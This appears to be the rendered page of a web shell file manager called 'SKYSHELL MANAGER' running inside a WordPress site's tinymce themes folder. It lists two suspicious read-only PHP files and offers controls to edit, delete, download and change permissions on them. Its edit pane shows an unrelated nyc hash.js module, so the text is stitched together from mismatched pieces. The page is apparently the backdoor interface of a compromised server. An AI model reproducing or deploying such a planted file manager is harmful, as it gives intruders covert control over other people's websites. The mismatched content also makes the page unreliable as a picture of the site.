📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: hash.js
'use strict' function getInvalidatingOptions (config) { return [ 'compact', 'esModules', 'ignoreClassMethods', 'instrument', 'instrumenter', 'parserPlugins', 'preserveComments', 'produceSourceMap', 'sourceMap' ].reduce((acc, optName) => { acc[optName] = config[optName] return acc }, {}) } module.exports = { salt (config) { return JSON.stringify({ modules: { 'istanbul-lib-instrument': require('istanbul-lib-instrument/package.json').version, nyc: require('../package.json').version }, nycrc: getInvalidatingOptions(config) }) } }
Save